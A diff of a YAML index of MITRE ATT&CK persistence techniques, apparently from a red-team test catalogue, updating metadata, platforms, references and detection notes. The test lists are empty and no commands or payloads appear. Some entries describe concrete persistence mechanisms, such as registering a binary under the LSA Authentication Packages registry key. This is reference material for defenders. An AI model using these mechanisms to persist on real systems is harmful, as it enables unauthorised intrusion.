           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T02:18:19.568Z'
       name: ROMMONkit
       description: |-
         Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -33214,41 +33634,10 @@ persistence:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1137.003:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
-      type: attack-pattern
-      created: '2019-11-07T20:06:02.624Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.003
-        url: https://attack.mitre.org/techniques/T1137/003
-      - source_name: SensePost Outlook Forms
-        url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
-        description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
-          February 4, 2019.
-      - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
-        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
-          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
-          4, 2019.
-      - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
-        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
-          provides blue teams with the ability to detect Ruler usage against Exchange.
-          Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:02:00.782Z'
       name: Outlook Forms
       description: |-
         Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)
@@ -33257,22 +33646,49 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
 
         Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
       - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
+      created: '2019-11-07T20:06:02.624Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/003
+        external_id: T1137.003
+      - source_name: Microsoft Detect Outlook Forms
+        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+          4, 2019.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+      - source_name: SensePost NotRuler
+        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+          provides blue teams with the ability to detect Ruler usage against Exchange.
+          Retrieved February 4, 2019.
+        url: https://github.com/sensepost/notruler
+      - source_name: SensePost Outlook Forms
+        description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
+          February 4, 2019.
+        url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1574:
     technique:
@@ -33338,7 +33754,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.005:
     technique:
@@ -33412,11 +33827,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -33433,7 +33847,6 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -33443,7 +33856,7 @@ persistence:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -33452,19 +33865,17 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -33512,11 +33923,12 @@ persistence:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1556.006:
     technique:
-      modified: '2024-04-16T00:20:21.488Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication
       description: "Adversaries may disable or modify multi-factor authentication
         (MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -33545,24 +33957,26 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Liran Ravich, CardinalOps
       - Muhammad Moiz Arshad, @5T34L7H
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Linux
       - macOS
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -33597,9 +34011,6 @@ persistence:
         url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1505.004:
     technique:
@@ -33659,7 +34070,7 @@ persistence:
         description: Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor
           on Targets in the Middle East. Retrieved July 6, 2018.
         source_name: Unit 42 RGDoor Jan 2018
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T15:06:24.161Z'
       name: IIS Components
       description: |-
         Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: <code>Get{Extension/Filter}Version</code>, <code>Http{Extension/Filter}Proc</code>, and (optionally) <code>Terminate{Extension/Filter}</code>. IIS modules may also be installed to extend IIS web servers.(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: IIS Backdoor 2011)(Citation: Trustwave IIS Module 2013)
@@ -33684,13 +34095,11 @@ persistence:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1505.004
     atomic_tests: []
   T1546:
     technique:
-      modified: '2024-03-01T15:49:15.588Z'
+      modified: '2024-10-15T15:57:00.731Z'
       name: Event Triggered Execution
       description: "Adversaries may establish persistence and/or elevate privileges
         using system mechanisms that trigger execution based on specific events. Various
@@ -33743,8 +34152,8 @@ persistence:
       - Windows
       - SaaS
       - IaaS
-      - Office 365
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'WMI: WMI Creation'
@@ -33792,78 +34201,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546
     atomic_tests: []
   T1546.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Robert Wilson
-      - Tony Lambert, Red Canary
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
-      type: attack-pattern
-      created: '2020-01-24T14:13:45.936Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1546.004
-        url: https://attack.mitre.org/techniques/T1546/004
-      - source_name: intezer-kaiji-malware
-        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
-        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
-          turning to Golang. Retrieved December 17, 2020.'
-      - source_name: bencane blog bashrc
-        url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
-        description: Benjamin Cane. (2013, September 16). Understanding a little more
-          about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
-      - source_name: anomali-rocke-tactics
-        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
-        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
-          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
-          December 17, 2020.
-      - source_name: Linux manual bash invocation
-        url: https://wiki.archlinux.org/index.php/Bash#Invocation
-        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
-      - source_name: Tsunami
-        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
-        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
-          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
-      - source_name: anomali-linux-rabbit
-        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
-        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
-          Malware Out of a Hat. Retrieved December 17, 2020.
-      - source_name: Magento
-        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
-        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
-          Vector. Retrieved December 17, 2020.
-      - source_name: ScriptingOSX zsh
-        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
-        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
-          Files. Retrieved February 25, 2021.'
-      - source_name: PersistentJXA_leopitt
-        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
-        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
-          for macOS. Retrieved January 11, 2021.
-      - source_name: code_persistence_zsh
-        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
-        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
-          Retrieved January 11, 2021.
-      - source_name: macOS MS office sandbox escape
-        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
-        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
-          Retrieved August 20, 2021.
-      - source_name: ESF_filemonitor
-        url: https://objective-see.com/blog/blog_0x48.html
-        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
-          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-25T15:02:24.143Z'
       name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
       description: "Adversaries may establish persistence through executing malicious
         commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
@@ -33911,6 +34253,10 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Robert Wilson
+      - Tony Lambert, Red Canary
+      x_mitre_deprecated: false
       x_mitre_detection: "While users may customize their shell profile files, there
         are only certain types of commands that typically appear in these files. Monitor
         for abnormal commands such as execution of unknown programs, opening network
@@ -33921,9 +34267,13 @@ persistence:
         events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
         most Linux and macOS systems, a list of file paths for valid shell options
         available on a system are located in the <code>/etc/shells</code> file.\n"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
       x_mitre_version: '2.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'File: File Creation'
@@ -33932,8 +34282,67 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+      created: '2020-01-24T14:13:45.936Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/004
+        external_id: T1546.004
+      - source_name: anomali-linux-rabbit
+        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+          Malware Out of a Hat. Retrieved December 17, 2020.
+        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+      - source_name: anomali-rocke-tactics
+        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+          December 17, 2020.
+        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+      - source_name: Linux manual bash invocation
+        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+        url: https://wiki.archlinux.org/index.php/Bash#Invocation
+      - source_name: ScriptingOSX zsh
+        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+          Files. Retrieved February 25, 2021.'
+        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+      - source_name: bencane blog bashrc
+        description: Benjamin Cane. (2013, September 16). Understanding a little more
+          about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+        url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+      - source_name: macOS MS office sandbox escape
+        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+          Retrieved August 20, 2021.
+        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+      - source_name: Magento
+        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+          Vector. Retrieved December 17, 2020.
+        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+      - source_name: Tsunami
+        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+      - source_name: PersistentJXA_leopitt
+        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+          for macOS. Retrieved January 11, 2021.
+        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+      - source_name: code_persistence_zsh
+        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+          Retrieved January 11, 2021.
+        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+      - source_name: ESF_filemonitor
+        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+        url: https://objective-see.com/blog/blog_0x48.html
+      - source_name: intezer-kaiji-malware
+        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+          turning to Golang. Retrieved December 17, 2020.'
+        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.004
     atomic_tests: []
   T1547.002:
@@ -33970,7 +34379,7 @@ persistence:
         Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
 
         Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\</code> with the key value of <code>"Authentication Packages"=&lt;target binary&gt;</code>. The binary will then be executed by the system when the authentication packages are loaded.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:29:36.291Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Authentication Package
       x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
@@ -33993,12 +34402,11 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.002
     atomic_tests: []
   T1546.015:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:34:29.402Z'
       name: 'Event Triggered Execution: Component Object Model Hijacking'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by hijacked references to Component Object Model (COM) objects.
@@ -34076,41 +34484,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.015
     atomic_tests: []
   T1137.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
-      type: attack-pattern
-      created: '2019-11-07T20:09:56.536Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.004
-        url: https://attack.mitre.org/techniques/T1137/004
-      - source_name: SensePost Outlook Home Page
-        url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
-        description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
-          Ruler Vector. Retrieved February 4, 2019.
-      - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
-        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
-          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
-          4, 2019.
-      - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
-        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
-          provides blue teams with the ability to detect Ruler usage against Exchange.
-          Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:02:13.742Z'
       name: 'Office Application Startup: Outlook Home Page'
       description: |
         Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)
@@ -34119,27 +34497,54 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
 
         Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
       - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
+      created: '2019-11-07T20:09:56.536Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/004
+        external_id: T1137.004
+      - source_name: Microsoft Detect Outlook Forms
+        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+          4, 2019.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+      - source_name: SensePost NotRuler
+        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+          provides blue teams with the ability to detect Ruler usage against Exchange.
+          Retrieved February 4, 2019.
+        url: https://github.com/sensepost/notruler
+      - source_name: SensePost Outlook Home Page
+        description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
+          Ruler Vector. Retrieved February 4, 2019.
+        url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1137.004
     atomic_tests: []
   T1574.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:35.788Z'
       name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -34200,7 +34605,6 @@ persistence:
         url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.009
     atomic_tests: []
   T1037.005:
@@ -34244,7 +34648,7 @@ persistence:
         mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
         StartupItems run during the bootup phase of macOS, they will run as the elevated
         root user."
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:43:21.560Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Startup Items'
       x_mitre_detection: |-
@@ -34266,7 +34670,6 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.005
     atomic_tests: []
   T1078.002:
@@ -34347,7 +34750,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.003:
     technique:
@@ -34370,7 +34772,7 @@ persistence:
         description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
           Active Directory Users and Computers in Windows Server 2008. Retrieved November
           15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:25.625Z'
       name: Network Logon Script
       description: "Adversaries may use network logon scripts automatically executed
         at logon initialization to establish persistence. Network logon scripts can
@@ -34400,12 +34802,10 @@ persistence:
       - 'File: File Modification'
       - 'Process: Process Creation'
       - 'File: File Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1197:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:21:40.927Z'
       name: BITS Jobs
       description: |-
         Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
@@ -34495,12 +34895,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1197
     atomic_tests: []
   T1546.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:45.568Z'
       name: 'Event Triggered Execution: AppInit DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -34585,7 +34984,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
